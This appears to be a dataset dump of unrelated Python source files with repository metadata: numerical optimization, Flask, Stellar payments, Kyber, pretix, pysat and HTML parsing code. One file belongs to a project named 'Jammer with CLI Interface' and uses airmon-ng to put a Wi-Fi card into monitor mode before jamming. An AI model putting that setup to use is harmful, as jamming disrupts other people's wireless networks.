"""Solves the optimization problem. The result is stored in the bound optimizationVariables.
If you will be solving the problem several times without modification (except for user data and
initial values of optimizationVariables), you may set cache=True to eliminate some overhead.
Note that caching does not work properly if you change constraints or non-optimization variables.
"""
print("OptimizationProblemBuilder.solve(): My optimization variables",[v.name for v in self.optimizationVariables])
#first check for cached values
if cache and hasattr(self,'_cached_problem'):
p,pToSelf,selfToP,optp = self._cached_problem
else:
#if not, do the preprocessing
if preprocess:
p,pToSelf,selfToP = self.preprocess()
else:
p = self
pToSelf,selfToP = None,None
optp = p.getProblem()
if cache:
self._cached_problem = p,pToSelf,selfToP,optp
seed = None
if params.globalMethod is None or params.globalMethod == 'random-restart':
#ensure that you have a seed
vseed = [v.value for v in p.optimizationVariables]
if all(v is not None for v in vseed):
seed = symbolic._flatten(vseed)
else:
assert all(v is None for v in vseed),"TODO: instantiation of partially bound values"
assert params.globalMethod is not None,"Only doing local optimization, need to provide a seed value"
(success,res) = params.solve(optp,seed)
if res is not None:
p.setVarVector(res)
if p is not self:
#the vector was set in a different context, now map p's variables to self's variables
for v,expr in zip(self.optimizationVariables,pToSelf):
v.bind(expr.eval(p.context))
return success
| 48.352941
| 177
| 0.579119
|
844b30e9784d81833548d8835d6ea8fcce6267f5
| 925
|
py
|
Python
|
Web dev/Flask/Projects/todo-app/app/routes.py
|
prathimacode-hub/WIE-WoC
|
f412f297a57249af98213bf4a747c897f2d4c035
|
[
"MIT"
] | 8
|
2022-03-01T09:09:20.000Z
|
2022-03-03T05:36:01.000Z
|
Web dev/Flask/Projects/todo-app/app/routes.py
|
prathimacode-hub/WIE-WoC
|
f412f297a57249af98213bf4a747c897f2d4c035
|
[
"MIT"
] | 52
|
2022-03-02T13:52:46.000Z
|
2022-03-04T03:03:17.000Z
|
Web dev/Flask/Projects/todo-app/app/routes.py
|
prathimacode-hub/WIE-WoC
|
f412f297a57249af98213bf4a747c897f2d4c035
|
[
"MIT"
] | 23
|
2022-03-01T06:39:34.000Z
|
2022-03-03T09:24:40.000Z
|
from flask import render_template, redirect, url_for, request
from app import app, db
from app.models import Todo
@app.route('/')
def index():
incomplete = Todo.query.filter_by(status=False).all()
complete = Todo.query.filter_by(status=True).all()
return render_template('index.html', complete=complete, incomplete=incomplete)
@app.route('/add', methods=['POST'])
def add():
todo = Todo(text=request.form['todoitem'], status=False)
db.session.add(todo)
db.session.commit()
return redirect(url_for('index'))
@app.route('/complete/<id>')
def complete(id):
todo = Todo.query.filter_by(id=int(id)).first()
todo.status = True
db.session.commit()
return redirect(url_for('index'))
@app.route('/incomplete/<id>')
def incomplete(id):
todo = Todo.query.filter_by(id=int(id)).first()
todo.status = False
db.session.commit()
return redirect(url_for('index'))
| 25.694444
| 82
| 0.678919
|
8122dc4db005fa7d78e1a0336f95e63b27d862c7
| 8,782
|
py
|
Python
|
polaris/polaris/management/commands/watch_transactions.py
|
paysharesdev/django-polaris
|
cbbebed5623a92074071f59f4bca65e2b1c6571b
|
[
"Apache-2.0"
] | null | null | null |
polaris/polaris/management/commands/watch_transactions.py
|
paysharesdev/django-polaris
|
cbbebed5623a92074071f59f4bca65e2b1c6571b
|
[
"Apache-2.0"
] | null | null | null |
polaris/polaris/management/commands/watch_transactions.py
|
paysharesdev/django-polaris
|
cbbebed5623a92074071f59f4bca65e2b1c6571b
|
[
"Apache-2.0"
] | null | null | null |
"""This module defines custom management commands for the app admin."""
import asyncio
from typing import Dict, Optional
from decimal import Decimal
from django.core.management.base import BaseCommand
from django.db.models import Q
from stellar_sdk.exceptions import NotFoundError
from stellar_sdk.transaction_envelope import TransactionEnvelope
from stellar_sdk.xdr import Xdr
from stellar_sdk.operation import Operation
from stellar_sdk.server import Server
from stellar_sdk.client.aiohttp_client import AiohttpClient
from polaris import settings
from polaris.models import Asset, Transaction
from polaris.utils import Logger
logger = Logger(__name__)
class Command(BaseCommand):
"""
Streams transactions for the distribution account of each Asset in the DB.
For every response from the server, attempts to find a matching transaction in
the database with `find_matching_payment_op` and updates the transaction's
status to `pending_anchor` or `pending_receiver` depending on the protocol.
Then, the ``execute_outgoing_transaction`` process will query for transactions
in those statuses and provide the anchor an integration function for executing
the payment or withdrawal.
"""
def handle(self, *args, **options): # pragma: no cover
try:
asyncio.run(self.watch_transactions())
except Exception as e:
# This is very likely a bug, so re-raise the error and crash.
# Heroku will restart the process unless it is repeatedly crashing,
# in which case restarting isn't of much use.
logger.exception("watch_transactions() threw an unexpected exception")
raise e
async def watch_transactions(self): # pragma: no cover
await asyncio.gather(
*[
self._for_account(asset.distribution_account)
for asset in Asset.objects.exclude(distribution_seed__isnull=True)
]
)
async def _for_account(self, account: str): # pragma: no cover
"""
Stream transactions for the server Stellar address.
"""
async with Server(settings.HORIZON_URI, client=AiohttpClient()) as server:
try:
# Ensure the distribution account actually exists
await server.load_account(account)
except NotFoundError:
# This exception will crash the process, but the anchor needs
# to provide valid accounts to watch.
raise RuntimeError(
"Stellar distribution account does not exist in horizon"
)
last_completed_transaction = (
Transaction.objects.filter(
Q(kind=Transaction.KIND.withdrawal) | Q(kind=Transaction.KIND.send),
receiving_anchor_account=account,
status=Transaction.STATUS.completed,
)
.order_by("-completed_at")
.first()
)
cursor = "now"
if last_completed_transaction:
cursor = last_completed_transaction.paging_token
endpoint = server.transactions().for_account(account).cursor(cursor)
async for response in endpoint.stream():
self.process_response(response, account)
@classmethod
def process_response(cls, response, account):
# We should not match valid pending transactions with ones that were
# unsuccessful on the stellar network. If they were unsuccessful, the
# client is also aware of the failure and will likely attempt to
# resubmit it, in which case we should match the resubmitted transaction
if not response.get("successful"):
return
# Query filters for SEP6 and 24
withdraw_filters = Q(
receiving_anchor_account=account,
status=Transaction.STATUS.pending_user_transfer_start,
kind=Transaction.KIND.withdrawal,
)
# Query filters for SEP31
send_filters = Q(
receiving_anchor_account=account,
status=Transaction.STATUS.pending_sender,
kind=Transaction.KIND.send,
)
pending_withdrawal_transactions = Transaction.objects.filter(
# query SEP 6, 24, & 31 pending transactions
withdraw_filters
| send_filters
)
matching_transaction, payment_op = None, None
for transaction in pending_withdrawal_transactions:
payment_op = cls.find_matching_payment_op(response, transaction)
if not payment_op:
continue
else:
matching_transaction = transaction
break
if not matching_transaction:
logger.info(f"No match found for stellar transaction {response['id']}")
return
# Transaction.amount_in is overwritten with the actual amount sent in the stellar
# transaction. This allows anchors to validate the actual amount sent in
# execute_outgoing_transactions() and handle invalid amounts appropriately.
matching_transaction.amount_in = round(
Decimal(payment_op.amount), matching_transaction.asset.significant_decimals,
)
# The stellar transaction has been matched with an existing record in the DB.
# Now the anchor needs to initiate the off-chain transfer of the asset.
#
# Prior to the 0.12 release, Polaris' SEP-6 and 24 integrations didn't not
# provide an interface that allowed anchors to check on the state of
# transactions on an external network. Now, ``poll_outgoing_transactions()``
# allows anchors to check on transactions that have been submitted to a
# non-stellar payment network but have not completed, and expects anchors to
# update them when they have.
if matching_transaction.protocol == Transaction.PROTOCOL.sep31:
# SEP-31 uses 'pending_receiver' status
matching_transaction.status = Transaction.STATUS.pending_receiver
matching_transaction.save()
else:
# SEP-6 and 24 uses 'pending_anchor' status
matching_transaction.status = Transaction.STATUS.pending_anchor
matching_transaction.save()
return
@classmethod
def find_matching_payment_op(
cls, response: Dict, transaction: Transaction
) -> Optional[Operation]:
"""
Determines whether or not the given ``response`` represents the given
``transaction``. Polaris does this by checking the 'memo' field in the horizon
response matches the `transaction.memo`, as well as ensuring the
transaction includes a payment operation of the anchored asset.
:param response: a response body returned from Horizon for the transaction
:param transaction: a database model object representing the transaction
"""
try:
stellar_transaction_id = response["id"]
envelope_xdr = response["envelope_xdr"]
except KeyError:
return
# memo from response must match transaction memo
memo = response.get("memo")
if (
transaction.protocol != Transaction.PROTOCOL.sep31
and memo != transaction.memo
) or (
transaction.protocol == Transaction.PROTOCOL.sep31
and memo != transaction.memo
):
return
horizon_tx = TransactionEnvelope.from_xdr(
envelope_xdr, network_passphrase=settings.STELLAR_NETWORK_PASSPHRASE,
).transaction
if horizon_tx.source.public_key != transaction.stellar_account:
# transaction wasn't created by sender of payment
return
matching_payment_op = None
for operation in horizon_tx.operations:
if cls._check_payment_op(operation, transaction.asset):
transaction.stellar_transaction_id = stellar_transaction_id
transaction.from_address = horizon_tx.source.public_key
transaction.paging_token = response["paging_token"]
transaction.status_eta = 0
transaction.save()
matching_payment_op = operation
break
return matching_payment_op
@staticmethod
def _check_payment_op(operation: Operation, want_asset: Asset) -> bool:
return (
operation.type_code() == Xdr.const.PAYMENT
and str(operation.destination) == want_asset.distribution_account
and str(operation.asset.code) == want_asset.code
and str(operation.asset.issuer) == want_asset.issuer
)
| 42.019139
| 89
| 0.654407
|
273254e0f855b050bd2d5f1db51c4c97ba0d6b8b
| 2,564
|
py
|
Python
|
app/utils.py
|
Cradac/dhbw-microblog
|
4f2bda483ec3864973a082038fec2bc8a9898bb2
|
[
"MIT"
] | null | null | null |
app/utils.py
|
Cradac/dhbw-microblog
|
4f2bda483ec3864973a082038fec2bc8a9898bb2
|
[
"MIT"
] | null | null | null |
app/utils.py
|
Cradac/dhbw-microblog
|
4f2bda483ec3864973a082038fec2bc8a9898bb2
|
[
"MIT"
] | null | null | null |
from app.models import User
'''
Das Paginator Objekt mit allen relevanten Variablen.
list: SuperListe aller SubListen (Seiten)
cur_page: aktuelle Seite (Index + 1 der list)
max_page: Anzahl der Seiten
items: list[cur_page-1], also return der aktuellen Seite;
Falls der Index out of Range ist -> Erste Seite; Falls die Liste Leer ist, Leere Liste returned
'''
class Paginator:
def __init__(self, list:list, cur_page:int, max_page:int):
self.list = list
self.cur_page = cur_page
self.max_page = max_page
try:
self.items = self.list[self.cur_page-1]
except IndexError:
try:
self.items = self.list[0]
except IndexError:
self.items = []
def __repr__(self):
return f'List with {self.max_page} pages. Current page is {self.cur_page}.'
'''
Die folgenden Klassenfunktionen zeigen einfach an ob eine nächste Seite existiert, und welchen Index diese hat.
Funktionen werden zur Link Generation verwendet
'''
def next_num(self):
return self.cur_page + 1
def prev_num(self):
return self.cur_page - 1
def has_next(self):
return not self.cur_page >= self.max_page
def has_prev(self):
return not self.cur_page == 1
'''
Funktion zum Erstellen eines Pagination Objektes
Die Objekte der Liste werden in [max] Lange Sublisten gepackt, welche dann an die Superliste angehangen werden
'''
def paginate(list: list, page: int, max: int):
list = reversed(list)
superlist = []
sublist = []
i = 0
p_i = 0
for entry in list:
# Objekt wird an Sublist gehangen
sublist.append(entry)
i += 1
# Sobald 5 Objekte in der Subliste sind wird diese an die Superlist appenden, die Subliste und der Iterator wird zurückgesetzt
# Page_Index wird erhöht
if i == max:
superlist.append(sublist)
sublist = []
i = 0
p_i += 1
# Nach Abschluss des for Loops wird eine teils gefüllte Liste angehängt
if len(sublist) > 0:
superlist.append(sublist)
p_i += 1
# Paginator Objekt wird returnt
return Paginator(superlist, page, p_i)
# FUnktion um jedem Post ein Autor Objekt hinzuzufügen; returnt eine Liste von (Post, Autor) Tupeln
def add_author(posts:list):
matched_posts = []
for post in posts:
author = User.query.filter_by(id=post.user_id).first()
matched_posts.append((post,author))
return matched_posts
| 34.186667
| 134
| 0.642746
|
26c852f701b2b302d7f519e176c388cc572b08ec
| 643
|
py
|
Python
|
Python Scripts/Jammer with CLI Interface/start_adapter.py
|
swalihkdan/YRov
|
415da1b74dc01134eb8ea597466b35ae380b909d
|
[
"MIT"
] | null | null | null |
Python Scripts/Jammer with CLI Interface/start_adapter.py
|
swalihkdan/YRov
|
415da1b74dc01134eb8ea597466b35ae380b909d
|
[
"MIT"
] | null | null | null |
Python Scripts/Jammer with CLI Interface/start_adapter.py
|
swalihkdan/YRov
|
415da1b74dc01134eb8ea597466b35ae380b909d
|
[
"MIT"
] | 1
|
2020-12-08T12:26:34.000Z
|
2020-12-08T12:26:34.000Z
|
import subprocess
import logging
def start_adapter():
#Configuring the logger
logging.basicConfig(filename="./logs/start_adapter.log",
format='%(asctime)s %(message)s',
filemode='w')
#Creating an object
logger=logging.getLogger()
#Setting the threshold of logger to DEBUG
logger.setLevel(logging.DEBUG)
logger.info("Started airmon-ng..................................")
airmon = subprocess.Popen(["airmon-ng","start","wlan0"],stdout = subprocess.PIPE , stderr = subprocess.PIPE)
stdout,stderr = airmon.communicate()
print("Note : Wifi Card is currently in MonitorMode")
| 29.227273
| 109
| 0.643857
|
6bb9e98656853155838637d70ff816e2a5c844d2
| 5,372
|
py
|
Python
|
src/pretix/presale/forms/waitinglist.py
|
pretix/pretix
|
78917afa1a3f0def9d4a67d31df811215708abec
|
[
"Apache-2.0"
] | 1,248
|
2015-04-24T13:32:06.000Z
|
2022-03-29T07:01:36.000Z
|
src/pretix/presale/forms/waitinglist.py
|
pretix/pretix
|
78917afa1a3f0def9d4a67d31df811215708abec
|
[
"Apache-2.0"
] | 2,113
|
2015-02-18T18:58:16.000Z
|
2022-03-31T11:12:32.000Z
|
src/pretix/presale/forms/waitinglist.py
|
pretix/pretix
|
78917afa1a3f0def9d4a67d31df811215708abec
|
[
"Apache-2.0"
] | 453
|
2015-05-13T09:29:06.000Z
|
2022-03-24T13:39:16.000Z
|
#
# This file is part of pretix (Community Edition).
#
# Copyright (C) 2014-2020 Raphael Michel and contributors
# Copyright (C) 2020-2021 rami.io GmbH and contributors
#
# This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General
# Public License as published by the Free Software Foundation in version 3 of the License.
#
# ADDITIONAL TERMS APPLY: Pursuant to Section 7 of the GNU Affero General Public License, additional terms are
# applicable granting you additional permissions and placing additional restrictions on your usage of this software.
# Please refer to the pretix LICENSE file to obtain the full terms applicable to this work. If you did not receive
# this file, see <https://pretix.eu/about/en/license>.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
# details.
#
# You should have received a copy of the GNU Affero General Public License along with this program. If not, see
# <https://www.gnu.org/licenses/>.
#
from django import forms
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.utils.translation import gettext_lazy as _
from phonenumber_field.formfields import PhoneNumberField
from phonenumbers.data import _COUNTRY_CODE_TO_REGION_CODE
from pretix.base.forms.questions import (
NamePartsFormField, WrappedPhoneNumberPrefixWidget, guess_country,
)
from pretix.base.i18n import get_babel_locale, language
from pretix.base.models import Quota, WaitingListEntry
from pretix.presale.views.event import get_grouped_items
class WaitingListForm(forms.ModelForm):
required_css_class = 'required'
class Meta:
model = WaitingListEntry
fields = ('name_parts', 'email', 'phone')
def __init__(self, *args, **kwargs):
self.event = kwargs.pop('event')
self.channel = kwargs.pop('channel')
customer = kwargs.pop('customer')
super().__init__(*args, **kwargs)
choices = [
('', '')
]
items, display_add_to_cart = get_grouped_items(
self.event, self.instance.subevent, require_seat=None,
memberships=(
self.request.customer.usable_memberships(
for_event=self.instance.subevent or self.event,
testmode=self.request.event.testmode
)
if customer else None
),
)
for i in items:
if not i.allow_waitinglist:
continue
if i.has_variations:
for v in i.available_variations:
if v.cached_availability[0] == Quota.AVAILABILITY_OK:
continue
choices.append((f'{i.pk}-{v.pk}', f'{i.name} – {v.value}'))
else:
if i.cached_availability[0] == Quota.AVAILABILITY_OK:
continue
choices.append((f'{i.pk}', f'{i.name}'))
self.fields['itemvar'] = forms.ChoiceField(
label=_('Product'),
choices=choices,
)
event = self.event
if event.settings.waiting_list_names_asked:
self.fields['name_parts'] = NamePartsFormField(
max_length=255,
required=event.settings.waiting_list_names_required,
scheme=event.settings.name_scheme,
titles=event.settings.name_scheme_titles,
label=_('Name'),
)
else:
del self.fields['name_parts']
if event.settings.waiting_list_phones_asked:
with language(get_babel_locale()):
default_country = guess_country(self.event)
for prefix, values in _COUNTRY_CODE_TO_REGION_CODE.items():
if str(default_country) in values and not self.initial.get('phone'):
# We now exploit an implementation detail in PhoneNumberPrefixWidget to allow us to pass just
# a country code but no number as an initial value. It's a bit hacky, but should be stable for
# the future.
self.initial['phone'] = "+{}.".format(prefix)
self.fields['phone'] = PhoneNumberField(
label=_("Phone number"),
required=event.settings.waiting_list_phones_required,
help_text=event.settings.waiting_list_phones_explanation_text,
widget=WrappedPhoneNumberPrefixWidget()
)
else:
del self.fields['phone']
def clean(self):
try:
iv = self.data.get('itemvar', '')
if '-' in iv:
itemid, varid = iv.split('-')
else:
itemid, varid = iv, None
self.instance.item = self.instance.event.items.get(pk=itemid)
if varid:
self.instance.variation = self.instance.item.variations.get(pk=varid)
else:
self.instance.variation = None
except ObjectDoesNotExist:
raise ValidationError(_("Invalid product selected."))
data = super().clean()
return data
| 40.390977
| 118
| 0.623232
|
2b76fa9f8c014895c61c7680ae490139422a308f
| 3,720
|
py
|
Python
|
pysat/instruments/timed_saber.py
|
scivision/pysat
|
2916ff7c77ad4201c537acca91b7c0b46b542e82
|
[
"BSD-3-Clause"
] | null | null | null |
pysat/instruments/timed_saber.py
|
scivision/pysat
|
2916ff7c77ad4201c537acca91b7c0b46b542e82
|
[
"BSD-3-Clause"
] | null | null | null |
pysat/instruments/timed_saber.py
|
scivision/pysat
|
2916ff7c77ad4201c537acca91b7c0b46b542e82
|
[
"BSD-3-Clause"
] | 1
|
2018-10-26T02:42:50.000Z
|
2018-10-26T02:42:50.000Z
|
# -*- coding: utf-8 -*-
"""Supports the Sounding of the Atmosphere using Broadband Emission Radiometry
(SABER) instrument on the Thermosphere Ionosphere Mesosphere Energetics
Dynamics (TIMED) satellite.
Properties
----------
platform
'timed'
name
'saber'
tag
None supported
sat_id
None supported
Note
----
SABER "Rules of the Road" for DATA USE
Users of SABER data are asked to respect the following guidelines
- Mission scientific and model results are open to all.
- Guest investigators, and other members of the scientific community or
general public should contact the PI or designated team member early in an
analysis project to discuss the appropriate use of the data.
- Users that wish to publish the results derived from SABER data should
normally offer co-authorship to the PI, Associate PI or designated team
members. Co-authorship may be declined. Appropriate acknowledgement of
institutions, personnel, and funding agencies should be given.
- Users should heed the caveats of SABER team members as to the
interpretation and limitations of the data. SABER team members may insist
that such caveats be published, even if co-authorship is declined. Data
and model version numbers should also be specified.
- Pre-prints of publications and conference abstracts should be widely
distributed to interested parties within the mission and related projects.
Warnings
--------
- Note on Temperature Errors: http://saber.gats-inc.com/temp_errors.php
Authors
-------
J. Klenzing, 4 March 2019
"""
from __future__ import print_function
from __future__ import absolute_import
import functools
import pysat
from pysat.instruments.methods import nasa_cdaweb as cdw
from pysat.instruments.methods import general as mm_gen
platform = 'timed'
name = 'saber'
# dictionary of data 'tags' and corresponding description
tags = {'': ''}
sat_ids = {'': ['']}
_test_dates = {'': {'': pysat.datetime(2019, 1, 1)}}
fname = ''.join(('timed_l2av207_saber_{year:04d}{month:02d}{day:02d}',
'????_v01.cdf'))
supported_tags = {'': {'': fname}}
# use the CDAWeb methods list files routine
list_files = functools.partial(mm_gen.list_files,
supported_tags=supported_tags)
# let pysat know that data is spread across more than one file
multi_file_day = True
pandas_format = True
load = cdw.load
basic_tag = {'dir': '/pub/data/timed/saber/level2a_v2_07_cdf',
'remote_fname': '{year:4d}/{month:02d}/' + fname,
'local_fname': fname}
supported_tags = {'': {'': basic_tag}}
download = functools.partial(cdw.download, supported_tags, multi_file_day=True)
# support listing files currently on CDAWeb
list_remote_files = functools.partial(cdw.list_remote_files,
supported_tags=supported_tags)
def clean(inst):
"""Routine to return PLATFORM/NAME data cleaned to the specified level
Cleaning level is specified in inst.clean_level and pysat
will accept user input for several strings. The clean_level is
specified at instantiation of the Instrument object.
'clean' All parameters should be good, suitable for statistical and
case studies
'dusty' All paramers should generally be good though same may
not be great
'dirty' There are data areas that have issues, data should be used
with caution
'none' No cleaning applied, routine not called in this case.
Parameters
-----------
inst : pysat.Instrument
Instrument class object, whose attribute clean_level is used to return
the desired level of data selectivity.
"""
return
| 32.068966
| 80
| 0.709946
|
dc64df24b371fd44a3c6206d960c9c45428445a0
| 4,653
|
py
|
Python
|
python/simulation/kyber/reference/poly.py
|
BayesianSCA/k-trace-CCA
|
8dbf10ff28712848dcb8874e370c3fe40a0566a0
|
[
"Apache-2.0",
"MIT"
] | 1
|
2022-03-14T01:19:56.000Z
|
2022-03-14T01:19:56.000Z
|
python/simulation/kyber/reference/poly.py
|
BayesianSCA/k-trace-CCA
|
8dbf10ff28712848dcb8874e370c3fe40a0566a0
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
python/simulation/kyber/reference/poly.py
|
BayesianSCA/k-trace-CCA
|
8dbf10ff28712848dcb8874e370c3fe40a0566a0
|
[
"Apache-2.0",
"MIT"
] | 1
|
2022-02-03T08:31:21.000Z
|
2022-02-03T08:31:21.000Z
|
import numpy as np
import math
from .ntt import basemul, zetas, ntt, invntt
from .reduce import barrett_reduce
from .params import KYBER_ETA1, KYBER_N
class poly(np.ndarray):
def __new__(cls, height=KYBER_N):
obj = np.zeros(height, dtype=np.int16).view(cls)
return obj
@property
def height(self):
return self.shape[0]
@property
def coeffs(self):
return self
@coeffs.setter
def coeffs(self, val):
self[:] = val
# /*************************************************
# * Name: poly_getnoise_eta1
# *
# * Description: Sample a polynomial deterministically from a seed and a nonce,
# * with output polynomial close to centered binomial distribution
# * with parameter KYBER_ETA1
# *
# * Arguments: - poly *r: pointer to output polynomial
# * - const uint8_t *seed: pointer to input seed
# * (of length KYBER_SYMBYTES bytes)
# * - uint8_t nonce: one-byte input nonce
# **************************************************/
def poly_getnoise_eta1(rng, height):
r = poly_cbd_eta1(rng, height)
return r
# /*************************************************
# * Name: poly_ntt
# *
# * Description: Computes negacyclic number-theoretic transform (NTT) of
# * a polynomial in place;
# * inputs assumed to be in normal order, output in bitreversed order
# *
# * Arguments: - uint16_t *r: pointer to in/output polynomial
# **************************************************/
def poly_ntt(r: poly) -> poly:
r_hat, _ = ntt(r.copy(), r.height, int(math.log2(r.height)) - 1)
r_hat = poly_reduce(r_hat)
return r_hat
def poly_invntt(r_hat: poly) -> poly:
r, _, _ = invntt(r_hat.copy(), r_hat.height, int(math.log2(r_hat.height)) - 1)
return r
# /*************************************************
# * Name: poly_basemul_montgomery
# *
# * Description: Multiplication of two polynomials in NTT domain
# *
# * Arguments: - poly *r: pointer to output polynomial
# * - const poly *a: pointer to first input polynomial
# * - const poly *b: pointer to second input polynomial
# **************************************************/
def poly_basemul_montgomery(a: poly, b: poly) -> poly:
assert a.height == b.height
r = poly(height=a.height)
zeta_offset = (
a.height // 4
) # 64, NOTE: formula should be correct for smaller heights
for i in range(a.height // 4):
r[4 * i : 4 * i + 2] = basemul(
a[4 * i : 4 * i + 2], b[4 * i : 4 * i + 2], zetas[zeta_offset + i]
)
r[4 * i + 2 : 4 * i + 4] = basemul(
a[4 * i + 2 : 4 * i + 4], b[4 * i + 2 : 4 * i + 4], -zetas[zeta_offset + i]
)
return r
# /*************************************************
# * Name: poly_reduce
# *
# * Description: Applies Barrett reduction to all coefficients of a polynomial
# * for details of the Barrett reduction see comments in reduce.c
# *
# * Arguments: - poly *r: pointer to input/output polynomial
# **************************************************/
def poly_reduce(r: poly) -> poly:
return barrett_reduce(r)
# /*************************************************
# * Name: poly_add
# *
# * Description: Add two polynomials; no modular reduction is performed
# *
# * Arguments: - poly *r: pointer to output polynomial
# * - const poly *a: pointer to first input polynomial
# * - const poly *b: pointer to second input polynomial
# **************************************************/
def poly_add(a: poly, b: poly) -> poly:
return a + b
def poly_sub(a: poly, b: poly) -> poly:
return a - b
# /*************************************************
# * Name: cbd2
# *
# * Description: Given an array of uniformly random bytes, compute
# * polynomial with coefficients distributed according to
# * a centered binomial distribution with parameter eta=2
# *
# * Arguments: - poly *r: pointer to output polynomial
# * - const uint8_t *buf: pointer to input byte array
# **************************************************/
def poly_cbd_eta1(rng, height=KYBER_N, KYBER_ETA1=KYBER_ETA1) -> poly:
assert KYBER_ETA1 == 2, "Not Implemented"
# implementing cbd2():
a = rng.integers(0, 2, height, dtype=np.int16)
a += rng.integers(0, 2, height, dtype=np.int16)
b = rng.integers(0, 2, height, dtype=np.int16)
b += rng.integers(0, 2, height, dtype=np.int16)
r = poly(height=height)
r.coeffs = a - b
return r
| 33.47482
| 87
| 0.526112
|
2f005a239a1d902db0fa9748b80ece0e67f16247
| 11,390
|
py
|
Python
|
perftrackerlib/browser/httputils.py
|
brusnigin/perftracker-lib
|
648de197aaa301001791764a7ac0a6e731edf74d
|
[
"MIT"
] | null | null | null |
perftrackerlib/browser/httputils.py
|
brusnigin/perftracker-lib
|
648de197aaa301001791764a7ac0a6e731edf74d
|
[
"MIT"
] | null | null | null |
perftrackerlib/browser/httputils.py
|
brusnigin/perftracker-lib
|
648de197aaa301001791764a7ac0a6e731edf74d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from __future__ import print_function
# -*- coding: utf-8 -*-
__author__ = "istillc0de@gmail.com"
__copyright__ = "Copyright 2018, The PerfTracker project"
__license__ = "MIT"
import re
import logging
import urllib
import tempfile
import os
import sys
if sys.version_info[0] < 3:
import urlparse
import httplib
from httplib import HTTPResponse
from BaseHTTPServer import BaseHTTPRequestHandler
from StringIO import StringIO
from HTMLParser import HTMLParser
else:
import urllib.parse as urlparse
import http.client as httplib
from http.client import HTTPResponse
from http.server import BaseHTTPRequestHandler
from io import StringIO
from html.parser import HTMLParser
reScriptLocation = re.compile(r"top\.location[\.href]*=\'(.*)\'")
reFormButtonUrl = re.compile(r"doSubmit\(\'(.*)\'")
###############################################################################
# Support classes for HTML page processing and action URLs extraction
#
class TagValueBase(object):
def __init__(self, tag):
self.tag = tag
self.value = None
self.inside = False
def is_processing(self):
return self.inside
class TagValueManual(TagValueBase):
def __init__(self, tag):
TagValueBase.__init__(self, tag)
def begin(self, tag):
if tag == self.tag:
self.inside = True
return True
return False
def end(self, tag):
if tag == self.tag:
self.inside = False
return True
return False
def set_value(self, value):
self.value = value
def clear_value(self):
self.value = None
class Request(object):
def __init__(self, url, method=None, uid=None):
self._params = {} # dict of parameters {name: value} (used by POST only)
self.url = None # URL without host name, e.g. /turbine
self.method = method.upper() if method else 'GET'
self.uid = uid # request ID
if url: # if url is None, Request considered as valid but incomplete
self.reset_url(url)
def reset_url(self, url):
url = urlparse.urlparse(url)
self.url = url.path
if not self.url.startswith('/'):
self.url = '/' + self.url
if self.method == 'POST':
self._params = dict(urlparse.parse_qsl(url.query))
else:
self._params = {}
if url.query:
self.url += '?' + url.query
def add_param(self, name, value):
if self.method == 'POST':
self._params[name] = value
else:
self.url += '&%s=%s' % (name, value)
def get_params(self):
# converts parameters dict into string (n1=v1&n2=v2&...)
return urllib.urlencode(self._params) if self._params else None
def is_complete(self):
return True if self.url else False
def process_action(self, tag, attrs):
if tag == 'button' and attrs.get('type','submit') == 'submit':
match = reFormButtonUrl.search(attrs.get('onclick', ''))
if match:
url = urllib.unquote(match.group(1))
url = HTMLParser().unescape(url)
self.uid = tag + ':' + attrs.get('name', 'none')
self.reset_url(url)
return True
return False
###############################################################################
# Class for HTML page processing (based on HTMLParser template)
#
# The main goal of class is gather all possible URLs of actions on page. After
# that, user would select one and use it either to build the chain of auto-redirected
# pages or for manual navigation (JFI: list of possible redirection methods
# https://code.google.com/p/html5security/wiki/RedirectionMethods).
#
class PageParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self._body_tag = TagValueManual('body')
self._form_tag = TagValueManual('form')
self._script_tag = TagValueManual('script')
self._noscript_tag = TagValueManual('noscript')
# Objects of Request type (public)
self.forms = []
self.iframe_src = None
self.body_onload = None
self.script = None
self.global_action = None # action outside <form>'s
self.form_auto_submit = False
def handle_starttag(self, tag, attributes):
attrs = {}
for attr in attributes:
attrs[attr[0].lower()] = attr[1]
# <noscript> (there is no any valuable information inside this tag)
if self._noscript_tag.begin(tag) or self._noscript_tag.is_processing():
return
# <script> (only set the flag, script body will be in handle_data())
if self._script_tag.begin(tag):
return
# <iframe> (process 'src' with URL)
if tag == 'iframe':
attr = attrs.get('src')
if attr:
self.iframe_src = Request(attr)
return
# <body> (process 'onload' with script)
if self._body_tag.begin(tag):
attr = attrs.get('onload')
if not attr:
pass
elif "document.forms[0].submit()" in attr:
self.form_auto_submit = True
else:
match = reScriptLocation.search(attr)
if match:
url = urllib.unquote(match.group(1))
url = HTMLParser().unescape(url)
self.body_onload = Request(url)
self._body_tag.set_value(Request(None, 'POST'))
return
# <form> (initialize the new form object)
if self._form_tag.begin(tag):
form_id = attrs.get('id') or attrs.get('name')
self._form_tag.set_value(Request(attrs.get('action'), attrs.get('method'), form_id))
return
# <form> ... </form> (fill the new form object with parameters)
if self._form_tag.is_processing():
# extract form parameters
if tag == 'input' and attrs.get('type') in ['hidden', 'text', 'password'] and attrs.get('name'):
self._form_tag.value.add_param(attrs['name'], attrs.get('value', ''))
# if form has no action attribute, try to use one from the submit button
if not self._form_tag.value.is_complete():
self._form_tag.value.process_action(tag, attrs)
# <body> ... </body> (uhh, get buttons outside <form>)
elif self._body_tag.is_processing():
if not self._body_tag.value.is_complete():
self._body_tag.value.process_action(tag, attrs)
def handle_endtag(self, tag):
# </form> (copy completed form into list)
if self._form_tag.end(tag):
if self._form_tag.value.is_complete():
self.forms.append(self._form_tag.value)
self._form_tag.clear_value()
# </body>
elif self._body_tag.end(tag):
if self._body_tag.value.is_complete():
self.global_action = self._body_tag.value
# </noscript>
elif self._noscript_tag.end(tag):
pass
# </script>
elif self._script_tag.end(tag):
pass
# </html> (finish HTML processing, perform all onexit steps)
elif tag == 'html':
if self._script_tag.value:
match = reScriptLocation.search(self._script_tag.value)
if match:
self.script = Request(match.group(1))
def handle_data(self, data):
# <script> body
if self._script_tag.is_processing():
self._script_tag.set_value(data)
###############################################################################
# Class for retrieving HTML page actions
#
class PageActionsExtractor:
def __init__(self, body):
self.pp = None
self.body = body
try:
self.pp = PageParser()
self.pp.feed(body)
